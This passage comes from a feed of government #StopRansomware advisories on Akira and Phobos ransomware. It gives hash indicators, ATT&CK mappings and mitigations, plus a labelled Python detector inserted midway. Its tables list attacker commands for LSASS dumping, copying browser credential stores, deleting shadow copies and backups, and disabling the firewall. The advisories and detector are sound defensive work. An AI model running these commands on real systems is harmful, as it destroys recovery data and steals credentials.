    Sysmon.exe | 1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386 | Ngrok tool for persistence
    Config.yml | Varies by use | Ngrok configuration file
    Rclone.exe | aaa647327ba5b855bedea8e889b3fafdc05a6ca75d1cfd98869432006d6fecc9 | Exfiltration tool
    Winscp.rnd | 7d6959bb7a9482e1caa83b16ee01103d982d47c70c72fdd03708e2b7f4c552c4 | Network file transfer program
    WinSCP-6.1.2-Setup.exe | 36cc31f0ab65b745f25c7e785df9e72d1c8919d35a1d7bd4ce8050c8c068b13c | Network file transfer program
    Akira_v2 | (two samples) | Akira_v2 ransomware
        3298d203c2acb68c474e5fdad8379181890b4403d6491c523c13730129be3f75
        0ee1d284ed663073872012c7bde7fac5ca1121403f1a5d2d5411317df282796c
    Megazord | (ten samples) | Akira "Megazord" ransomware
        ffd9f58e5fe8502249c67cad0123ceeeaa6e9f69b4ec9f9e21511809849eb8fc
        dfe6fddc67bdc93b9947430b966da2877fda094edf3e21e6f0ba98a84bc53198
        131da83b521f610819141d5c740313ce46578374abb22ef504a7593955a65f07
        9f393516edf6b8e011df6ee991758480c5b99a0efbfd68347786061f0e04426c
        9585af44c3ff8fd921c713680b0c2b3bbc9d56add848ed62164f7c9b9f23d065
        2f629395fdfa11e713ea8bf11d40f6f240acf2f5fcf9a2ac50b6f7fbc7521c83
        7f731cc11f8e4d249142e99a44b9da7a48505ce32c4ee4881041beeddb3760be
        95477703e789e6182096a09bc98853e0a70b680a4f19fa2bf86cbb9280e8ec5a
        0c0e0f9b09b80d87ebc88e2870907b6cacb4cd7703584baf8f2be1fd9438696d
        C9c94ac5e1991a7db42c7973e328fceeb6f163d9f644031bdfd4123c7b3898b0
    VeeamHax.exe | aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d | Plaintext credential leaking tool
    Veeam-Get-Creds.ps1 | 18051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88 | PowerShell script for obtaining and decrypting accounts from Veeam servers
    PowershellKerberos TicketDumper | 5e1e3bf6999126ae4aa52146280fdb913912632e8bac4f54e98c58821a307d32 | Kerberos ticket dumping tool from LSA cache
    sshd.exe | 8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694 | OpenSSH Backdoor
    ipscan-3.9.1-setup.exe | 892405573aa34dfc49b37e4c35b655543e88ec1c5e8ffb27ab8d1bbf90fc6ae0 | Network scanner that scans IP addresses and ports

    Table 2b: Malicious Files Affiliated with Akira Ransomware

    File Name | Hash (MD5) | Description
    winrar-x64-623.exe | 7a647af3c112ad805296a22b2a276e7c | Network file transfer program

    Disclaimer: While the date/time can be changed by Akira threat actors, trusted third-party analysis confirmed these samples were created on December 28, 2023.
Table 3: Windows Akira Ransomware Samples, Hash (SHA-256)

Table 4: Linux/Unix Akira Ransomware Executable and Linkable Format (ELF) Samples, Hash (SHA-256)
e1321a4b2b104f31aceaf4b19c5559e40ba35b73a754d3ae13d8e90c53146c0f
74f497088b49b745e6377b32ed5d9dfaef3c84c7c0bb50fabf30363ad2e0bfb1
3d2b58ef6df743ce58669d7387ff94740ceb0122c4fc1c4ffd81af00e72e60a4

Table 5a: Commands Affiliated with Akira Ransomware (Persistence and Discovery)
nltest /dclist: [T1018]
nltest /DOMAIN_TRUSTS [T1482]
net group “Domain admins” /dom [T1069.002]
net localgroup “Administrators” /dom [T1069.001]
tasklist [T1057]
rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\windows\temp\lsass.dmp full [T1003.001]

Table 5b: Commands Affiliated with Akira Ransomware (Credential Access)
cmd.exe /Q /c esentutl.exe /y “C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<firefox_profile_id>.default-release\key4.db” /d “C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<firefox_profile_id>.default-release\key4.db.tmp”
Note: Used for accessing Firefox data.
cmd.exe /Q /c esentutl.exe /y “C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Login Data” /d “C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp”
Note: Used for accessing Google Chrome data.
Table 5c: Commands Affiliated with Akira Ransomware (Impact)
powershell.exe -Command “Get-WmiObject Win32_Shadowcopy | Remove-WmiObject” [T1490]

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 6-14 for all referenced Akira threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 6: Initial Access

Technique Title | ID | Use
Valid Accounts | T1078 | Akira threat actors obtain and abuse credentials of existing accounts as a means of gaining initial access.
Exploit Public Facing Application | T1190 | Akira threat actors exploit vulnerabilities in internet-facing systems to gain access to systems.
External Remote Services | T1133 | Akira threat actors have used remote access services, such as RDP/VPN connections, to gain initial access.
Phishing: Spearphishing Attachment | T1566.001 | Akira threat actors use phishing emails with malicious attachments to gain access to networks.
Phishing: Spearphishing Link | T1566.002 | Akira threat actors use phishing emails with malicious links to gain access to networks.

Table 7: Credential Access

Technique Title | ID | Use
OS Credential Dumping | T1003 | Akira threat actors use tools like Mimikatz and LaZagne to dump credentials.
OS Credential Dumping: LSASS Memory | T1003.001 | Akira threat actors attempt to access credential material stored in the process memory of LSASS.

Table 8: Discovery

Technique Title | ID | Use
System Network Configuration Discovery | T1016 | Akira threat actors use tools to scan systems and identify services running on remote hosts and local network infrastructure.
System Information Discovery | T1082 | Akira threat actors use tools like PCHunter64 to acquire detailed process and system information.
Domain Trust Discovery | T1482 | Akira threat actors use the net Windows command to enumerate domain information.
Process Discovery | T1057 | Akira threat actors use the Tasklist utility to obtain details on running processes via PowerShell.
Permission Groups Discovery: Local Groups | T1069.001 | Akira threat actors use net localgroup /dom to find local system groups and permission settings.
Permission Groups Discovery: Domain Groups | T1069.002 | Akira threat actors use the net group /domain command to attempt to find domain level groups and permission settings.
Remote System Discovery | T1018 | Akira threat actors use nltest /dclist to amass a listing of other systems by IP address, hostname, or other logical identifiers on a network.

Table 9: Persistence

Technique Title | ID | Use
Create Account: Domain Account | T1136.002 | Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts to establish persistence.

Table 10: Defense Evasion

Technique Title | ID | Use
Impair Defenses: Disable or Modify Tools | T1562.001 | Akira threat actors use BYOVD attacks to disable antivirus software.

Table 11: Command and Control

Technique Title | ID | Use
Remote Access Software | T1219 | Akira threat actors use legitimate desktop support software like AnyDesk to obtain remote access to victim systems.
Proxy | T1090 | Akira threat actors utilized Ngrok to create a secure tunnel to servers that aided in exfiltration of data.

Table 12: Collection

Technique Title | ID | Use
Archive Collected Data: Archive via Utility | T1560.001 | Akira threat actors use tools like WinRAR to compress files.

Table 13: Exfiltration

Technique Title | ID | Use
Exfiltration Over Alternative Protocol | T1048 | Akira threat actors use file transfer tools like WinSCP to transfer data.
Transfer Data to Cloud Account | T1537 | Akira threat actors use tools like CloudZilla to exfiltrate data to a cloud account and connect to exfil servers they control.
Exfiltration Over Web Service: Exfiltration to Cloud Storage | T1567.002 | Akira threat actors leveraged RClone to sync files with cloud storage services to exfiltrate data.
Table 14: Impact

Technique Title | ID | Use
Data Encrypted for Impact | T1486 | Akira threat actors encrypt data on target systems to interrupt availability to system and network resources.
Inhibit System Recovery | T1490 | Akira threat actors delete volume shadow copies on Windows systems.
Financial Theft | T1657 | Akira threat actors use a double-extortion model for financial gain.

MITIGATIONS

Network Defenders

The FBI, CISA, EC3, and NCSC-NL recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Akira ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

• Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [CPG 2.F, 2.R, 2.S].
• Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards. In particular, require employees to use long passwords and consider not requiring recurring password changes, as these can weaken security [CPG 2.C].
• Require multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H].
• Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
• Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between, and access to, various subnetworks and by restricting adversary lateral movement [CPG 2.F].
• Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
• Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents threat actors from directly connecting to remote access services that they have established for persistence.
• Install, regularly update, and enable real time detection for antivirus software on all hosts.
• Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 1.A, 2.O].
• Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].
• Disable unused ports [CPG 2.V].
• Consider adding an email banner to emails received from outside of your organization [CPG 2.M].
• Disable hyperlinks in received emails.
• Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
• Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E, 2.N].
• Maintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, the organization helps ensure it will not be severely interrupted and/or left with irretrievable data.
• Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, the FBI, CISA, EC3, and NCSC-NL recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, EC3, and NCSC-NL recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:
1. Select an ATT&CK technique described in this advisory (see Tables 6-14).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The FBI, CISA, EC3, and NCSC-NL recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
Resource to mitigate a ransomware attack: #StopRansomware Guide.
No cost cyber hygiene services: Cyber Hygiene Services, Ransomware Readiness Assessment.

REFERENCES

Fortinet: Ransomware Roundup – Akira
Cisco: Akira Ransomware Targeting VPNs without MFA
Truesec: Indications of Akira Ransomware Group Actively Exploiting Cisco AnyConnect CVE-2020-3259
TrendMicro: Akira Ransomware Spotlight
CrowdStrike: What is a Kerberoasting Attack?
Sophos: Akira, again: The ransomware that keeps on taking
Sophos: Akira Ransomware is “bringin’ 1988 back”

REPORTING

Your organization has no obligation to respond or provide information back to the FBI in response to this joint CSA. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws. The FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Akira threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.

The FBI, CISA, EC3, and NCSC-NL do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or by calling 1-844-Say-CISA (1-844-729-2472)).

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, EC3, and NCSC-NL do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI or CISA.

ACKNOWLEDGEMENTS

Cisco, Sophos, and Fortinet contributed to this advisory.

VERSION HISTORY

April 18, 2024: Initial version.

  • #StopRansomware: Phobos Ransomware
    by CISA (CISA Cybersecurity Advisories) on 26 February 2024 at 2:51 pm

    SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024, according to open source reporting. Phobos is structured as a ransomware-as-a-service (RaaS) model. Since May 2019, Phobos ransomware incidents impacting state, local, tribal, and territorial (SLTT) governments have been regularly reported to the MS-ISAC. These incidents targeted municipal and county governments, emergency services, education, public healthcare, and other critical infrastructure entities to successfully ransom several million U.S. dollars.[1],[2]

The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Phobos ransomware and other ransomware incidents.

Download the PDF version of this report: AA24-060A #StopRansomware: Phobos Ransomware (PDF, 678.84 KB)

For a downloadable copy of indicators of compromise (IOCs), see: AA24-060A STIX XML (XML, 147.73 KB), AA24-060A STIX JSON (JSON, 119.53 KB)

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14.
See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Overview

According to open source reporting, Phobos ransomware is likely connected to numerous variants (including Elking, Eight, Devos, Backmydata, and Faust ransomware) due to similar TTPs observed in Phobos intrusions. Phobos ransomware operates in conjunction with various open source tools such as Smokeloader, Cobalt Strike, and Bloodhound. These tools are all widely accessible and easy to use in various operating environments, making it (and associated variants) a popular choice for many threat actors.[3],[4]

Reconnaissance and Initial Access

Phobos actors typically gain initial access to vulnerable networks by leveraging phishing campaigns [T1598] to drop hidden payloads, by using internet protocol (IP) scanning tools, such as Angry IP Scanner, to search for vulnerable Remote Desktop Protocol (RDP) ports [T1595.001], or by leveraging RDP on Microsoft Windows environments.[5],[6] Once they discover an exposed RDP service, the actors use open source brute force tools to gain access [T1110]. If Phobos actors gain successful RDP authentication [T1133][T1078] in the targeted environment, they perform open source research to create a victim profile and connect the targeted IP addresses to their associated companies [T1593]. Threat actors leveraging Phobos have notably deployed remote access tools to establish a remote connection within the compromised network [T1219].[7]

Alternatively, threat actors send spoofed email attachments [T1566.001] that are embedded with hidden payloads [T1204.002] such as SmokeLoader, a backdoor trojan that is often used in conjunction with Phobos. After SmokeLoader’s hidden payload is downloaded onto the victim’s system, threat actors use the malware’s functionality to download the Phobos payload and exfiltrate data from the compromised system.

Execution and Privilege Escalation

Phobos actors run executables like 1saas.exe or cmd.exe to deploy additional Phobos payloads that have elevated privileges enabled [TA0004]. Additionally, Phobos actors can use the previous commands to perform various Windows shell functions. The Windows command shell enables threat actors to control various aspects of a system, with multiple permission levels required for different subsets of commands [T1059.003][T1105].[8]

Smokeloader Deployment

Phobos operations feature a standard three phase process to decrypt a payload that allows the threat actors to deploy additional destructive malware.[9] For the first phase, Smokeloader manipulates either the VirtualAlloc or VirtualProtect API function, which opens an entry point, enabling code to be injected into running processes and allowing the malware to evade network defense tools [T1055.002]. In the second phase, a stealth process is used to obfuscate command and control (C2) activity by producing requests to legitimate websites [T1001.003].[10] Within this phase, the shellcode also sends a call from the entry point to a memory container [T1055.004] and prepares a portable executable for deployment in the final stage [T1027.002][T1105][T1140]. Finally, once Smokeloader reaches its third stage, it unpacks a program-erase cycle from stored memory, which is then sent to be extracted from a SHA 256 hash as a payload.[7] Following successful payload decryption, the threat actors can begin downloading additional malware.

Additional Phobos Defense Evasion Capabilities

Phobos ransomware actors have been observed bypassing organizational network defense protocols by modifying system firewall configurations using commands like netsh firewall set opmode mode=disable [T1562.004]. Additionally, Phobos actors can evade detection by using the following tools: Universal Virus Sniffer, Process Hacker, and PowerTool [T1562].

Persistence and Privilege Escalation

According to open source reporting, Phobos ransomware uses commands such as Exec.exe or the bcdedit[.]exe control mechanism. Phobos has also been observed using Windows Startup folders and Run Registry Keys such as C:/Users\Admin\AppData\Local\directory [T1490][T1547.001] to maintain persistence within compromised environments.[5] Additionally, Phobos actors have been observed using built-in Windows API functions [T1106] to steal tokens [T1134.001], bypass access controls, and create new processes to escalate privileges by leveraging the SeDebugPrivilege process [T1134.002]. Phobos actors attempt to authenticate using cached password hashes on victim machines until they reach domain administrator access [T1003.005].

Discovery and Credential Access

Phobos actors additionally use open source tools [T1588.002] such as Bloodhound and Sharphound to enumerate the active directory [T1087.002]. Mimikatz and NirSoft, as well as Remote Desktop Passview to export browser client credentials [T1003.001][T1555.003], have also been used. Furthermore, Phobos ransomware is able to enumerate connected storage devices [T1082] and running processes [T1057], and to encrypt user files [T1083].

Exfiltration

Phobos actors have been observed using WinSCP and Mega.io for file exfiltration.[11] They use WinSCP to connect directly from a victim network to an FTP server [T1071.002] they control [TA0010]. Phobos actors install Mega.io [T1048] and use it to export victim files directly to a cloud storage provider [T1567.002]. Data is typically archived as either a .rar or .zip file [T1560] to be later exfiltrated. They target legal documentation, financial records, technical documents (including network architecture), and databases for commonly used password management software [T1555.005].

Impact

After the exfiltration phase, Phobos actors then hunt for backups. They use vssadmin.exe and the Windows Management Instrumentation command-line utility (WMIC) to discover and delete volume shadow copies in Windows environments. This prevents victims from recovering files after encryption has taken place [T1047][T1490]. Phobos.exe contains functionality to encrypt all connected logical drives on the target host [T1486]. Each Phobos ransomware executable has unique build identifiers (IDs), affiliate IDs, as well as a unique ransom note which is embedded in the executable. After the ransom note has populated on infected workstations, Phobos ransomware continues to search for and encrypt additional files.

Most extortion [T1657] occurs via email; however, some affiliate groups have used voice calls to contact victims. In some cases, Phobos actors have used onion sites to list victims and host stolen victim data. Phobos actors use various instant messaging applications such as ICQ, Jabber, and QQ to communicate [T1585]. See Figure 2 for a list of email providers used by the following Phobos affiliates: Devos, Eight, Elbie, Eking, and Faust.[6]

Figure 1: Phobos Affiliate Providers List

INDICATORS OF COMPROMISE (IOCs)

See Table 1 through 6 for IOCs obtained from CISA and the FBI investigations from September through November 2023.
Table 1: Associated Phobos Domains
adstat477d[.]xyz
demstat577d[.]xyz [12]
serverxlogs21[.]xyz

Table 2: Observed Phobos Shell Commands
vssadmin delete shadows /all /quiet [T1490]
netsh advfirewall set currentprofile state off
wmic shadowcopy delete
netsh firewall set opmode mode=disable [T1562.004]
bcdedit /set {default} bootstatuspolicy ignoreallfailures [T1547.001]
bcdedit /set {default} recoveryenabled no [T1490]
wbadmin delete catalog -quiet
mshta C:\%USERPROFILE%\Desktop\info.hta [T1218.005]
mshta C:\%PUBLIC%\Desktop\info.hta
mshta C:\info.hta

The commands above are observed during the execution of a Phobos encryption executable. A Phobos encryption executable spawns a cmd.exe process, which then executes the commands listed in Table 1 with their respective Windows system executables. When the commands above are executed on a Windows system, volume shadow copies are deleted and Windows Firewall is disabled. Additionally, the system’s boot status policy is set to boot even when there are errors during the boot process, and automatic recovery options, like Windows Recovery Environment (WinRE), are disabled for the given boot entry. The system’s backup catalog is also deleted. Finally, the Phobos ransom note is displayed to the end user using mshta.exe.
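As an added example (not part of either advisory), the following Python detector applies the command patterns from the Akira command tables (Tables 5a-5c) and the Phobos shell command table (Table 2) to process-creation log lines, and rates a cluster higher when several distinct recovery-inhibiting or firewall-disabling commands run under one parent process within a short window, which is the sequence both advisories describe. The log schema, host names, PIDs, and file paths are constructed assumptions, not a real sensor format.

```python
"""Detect the shadow-copy deletion, firewall disabling, boot-recovery tampering and
credential-access commands listed in the Akira and Phobos advisories, then correlate
hits by parent process (an encryptor spawning cmd.exe is the pattern both describe)."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed log schema (not Sysmon's or any vendor's real format): one process-creation
# event per line, fields separated by " | ". The command line is the last field so it may
# itself contain "|" (the PowerShell shadow-copy command does).
FIELDS = ("utc_time", "host", "parent_pid", "parent_image", "pid", "image", "command_line")

# (rule name, ATT&CK technique cited by the advisories, pattern over the command line)
RULES = [
    ("vssadmin shadow copy deletion", "T1490",
     re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I)),
    ("wmic shadow copy deletion", "T1490",
     re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("PowerShell Win32_Shadowcopy removal", "T1490",
     re.compile(r"Win32_Shadowcopy\s*\|\s*Remove-WmiObject", re.I)),
    ("wbadmin backup catalog deletion", "T1490",
     re.compile(r"wbadmin(?:\.exe)?\s+delete\s+catalog", re.I)),
    ("bcdedit recovery environment disabled", "T1490",
     re.compile(r"bcdedit(?:\.exe)?\s.*recoveryenabled\s+no", re.I)),
    ("bcdedit boot status policy ignores failures", "T1547.001",
     re.compile(r"bcdedit(?:\.exe)?\s.*bootstatuspolicy\s+ignoreallfailures", re.I)),
    ("Windows Firewall disabled via netsh", "T1562.004",
     re.compile(r"netsh(?:\.exe)?\s+(?:advfirewall\s+set\s+\w+\s+state\s+off"
                r"|firewall\s+set\s+opmode\s+mode=disable)", re.I)),
    ("mshta launching an HTA file", "T1218.005",
     re.compile(r"mshta(?:\.exe)?\s+\S+\.hta", re.I)),
    ("LSASS dump through comsvcs.dll MiniDump", "T1003.001",
     re.compile(r"comsvcs\.dll\s*,\s*MiniDump", re.I)),
    ("esentutl copy of a browser credential store", "T1555.003",
     re.compile(r"esentutl(?:\.exe)?\s+/y\s+.*(?:key4\.db|Login Data)", re.I)),
]


def parse_event(line):
    """Split one log line into a dict; None for lines that do not fit the schema."""
    parts = [p.strip() for p in line.split(" | ", len(FIELDS) - 1)]
    if len(parts) != len(FIELDS):
        return None
    event = dict(zip(FIELDS, parts))
    event["utc_time"] = datetime.strptime(event["utc_time"], "%Y-%m-%dT%H:%M:%SZ")
    return event


def match_rules(command_line):
    """(rule name, technique) pairs whose pattern occurs in the command line."""
    return [(name, tid) for name, tid, rx in RULES if rx.search(command_line)]


def scan(lines):
    """One finding per (event, rule) hit."""
    findings = []
    for line in lines:
        event = parse_event(line)
        if event is None:
            continue
        for name, tid in match_rules(event["command_line"]):
            findings.append({**event, "rule": name, "technique": tid})
    return findings


def correlate(findings, window_seconds=300):
    """Group hits by the process that spawned them.

    Two or more distinct T1490/T1562.004 rules under one parent inside the window is rated
    high; a lone hit stays medium because administrators also run vssadmin or bcdedit."""
    by_parent = defaultdict(list)
    for f in findings:
        by_parent[(f["host"], f["parent_pid"], f["parent_image"])].append(f)
    clusters = []
    for (host, ppid, pimage), hits in by_parent.items():
        hits.sort(key=lambda f: f["utc_time"])
        span = (hits[-1]["utc_time"] - hits[0]["utc_time"]).total_seconds()
        impact = {f["rule"] for f in hits if f["technique"] in ("T1490", "T1562.004")}
        severity = "high" if len(impact) >= 2 and span <= window_seconds else "medium"
        clusters.append({"host": host, "parent_pid": ppid, "parent_image": pimage,
                         "hits": len(hits), "distinct_impact_rules": len(impact),
                         "span_seconds": span, "severity": severity})
    return clusters


# Constructed sample events (hosts, PIDs and paths are made up): the first six mirror the
# Phobos Table 2 sequence run by cmd.exe under an unknown parent; two benign lines follow;
# the last is a single Akira Table 5c hit under a different parent.
SAMPLE_LOG = [
    r"2024-01-15T10:00:01Z | WS01 | 4212 | C:\Users\Public\unknown.exe | 5001 | C:\Windows\System32\cmd.exe | cmd.exe /c vssadmin delete shadows /all /quiet",
    r"2024-01-15T10:00:02Z | WS01 | 4212 | C:\Users\Public\unknown.exe | 5002 | C:\Windows\System32\cmd.exe | cmd.exe /c wmic shadowcopy delete",
    r"2024-01-15T10:00:03Z | WS01 | 4212 | C:\Users\Public\unknown.exe | 5003 | C:\Windows\System32\cmd.exe | cmd.exe /c netsh advfirewall set currentprofile state off",
    r"2024-01-15T10:00:04Z | WS01 | 4212 | C:\Users\Public\unknown.exe | 5004 | C:\Windows\System32\cmd.exe | cmd.exe /c bcdedit /set {default} recoveryenabled no",
    r"2024-01-15T10:00:05Z | WS01 | 4212 | C:\Users\Public\unknown.exe | 5005 | C:\Windows\System32\cmd.exe | cmd.exe /c wbadmin delete catalog -quiet",
    r"2024-01-15T10:00:06Z | WS01 | 4212 | C:\Users\Public\unknown.exe | 5006 | C:\Windows\System32\mshta.exe | mshta C:\Users\Public\Desktop\info.hta",
    r"2024-01-15T11:30:00Z | WS01 | 1000 | C:\Windows\explorer.exe | 5100 | C:\Windows\System32\notepad.exe | notepad.exe C:\Users\alice\notes.txt",
    r"2024-01-15T12:00:00Z | SRV02 | 2222 | C:\Windows\System32\cmd.exe | 6001 | C:\Windows\System32\vssadmin.exe | vssadmin list shadows",
    r'2024-01-15T13:00:00Z | SRV02 | 3333 | C:\Windows\System32\cmd.exe | 6002 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"',
]

if __name__ == "__main__":
    for cluster in correlate(scan(SAMPLE_LOG)):
        print(cluster)
```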
Table 3: Observed Phobos Registry Keys
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\<Phobos exe name>
C:/Users\Admin\AppData\Local\directory

Table 4: Observed Phobos Actor Email Addresses

Table 5: Observed Phobos Actor Telegram Username
@phobos_support

Table 6: Observed Phobos Actor Wickr Address
Vickre me

Disclaimer: Organizations are encouraged to investigate the use of the IOCs in Table 7 for related signs of compromise prior to performing remediation actions.

Table 7: Phobos IOCs from September through December 2023

Associated IP Address | File Type | File Name | SHA 256 Hash
194.165.16[.]4 (October 2023) | Win32.exe | Ahpdate.exe [13] | 0000599cbc6e5b0633c5a6261c79e4d3d81005c77845c6b0679d854884a8e02f
45.9.74[.]14 (December 2023); 147.78.47[.]224 (December 2023) | Executable and Linkable Format (ELF) [14] | 1570442295 (Trojan Linux Mirai) | 7451be9b65b956ee667081e1141531514b1ec348e7081b5a9cd1308a98eec8f0
185.202.0[.]111 (September 2023) | Win32.exe [15] | cobaltstrike_shellcode[.]exe (C2 activity) |
185.202.0[.]111 (December 2023) | .txt [16] | f1425cff3d28afe5245459afa6d7985081bc6a62f86dce64c63daeb2136d7d2c.bin (Trojan) |

Disclaimer: Organizations are encouraged to investigate the use of the file hashes in Tables 8 and 9 for related signs of compromise prior to performing remediation actions.

Table 8: Phobos Actor File Hashes Observed in October 2023 (Phobos Ransomware SHA 256 Malicious Trojan Executable File Hashes)

Table 9: Phobos Actor File Hashes from Open Source from November 2023 [17] (Phobos Ransomware SHA 256 File Hashes)

MITRE ATT&CK TECHNIQUES

See Table 10 through 22 for all threat actor tactics and techniques referenced in this advisory.
Table 10: Phobos Threat Actors ATT&CK Techniques for Enterprise – Reconnaissance Technique Title ID Use Search Open Websites/Domains T1593 Phobos actors perform open source research to find information about victims that can be used during targeting to create a victim profile. Scanning IP Blocks T1595.001 Phobos actors used IP scanning tools to include Angry IP Scanner to search for vulnerable RDP ports. Phishing for Information T1598 Phobos actors use phishing campaigns to social engineer information from users and gain access to vulnerable RDP ports. Table 11: Phobos Threat Actors ATT&CK Techniques for Enterprise – Resource Development Technique Title ID Use Establish Accounts T1585 Phobos actors establish accounts to communicate. Obtain Capabilities: Tool T1588.002 Phobos actors used open source tools in their attack. Table 12: Phobos Threat Actors ATT&CK Techniques for Enterprise – Initial Access Technique Title ID Use Valid Accounts T1078 Following successful RDP authentication, Phobos actors search for IP addresses and pair them with their associated computer to create a victim profile. External Remote Services T1133 Phobos actors may leverage external-facing remote services to initially access and/or persist within a network. Phishing: Spearphishing Attachment T1566.001 Phobos actors used a spoofed email attachment to execute attack. Table 13: Phobos Threat Actors ATT&CK Techniques for Enterprise – Execution Technique Title ID Use Windows Management Instrumentation T1047 Phobos actors used Windows Management Instrumentation command-line utility (WMIC) to prevent victims from recovering files. Windows Command Shell T1059.003 Phobos actors can use the previous commands to perform commands with windows shell functions. Native API T1106 Phobos actors used open source tools to enumerate the active directory. Malicious File T1204.002 Phobos actors attached a malicious email attachment to deliver ransomware. 
Table 14: Phobos Threat Actors ATT&CK Techniques for Enterprise – Persistence

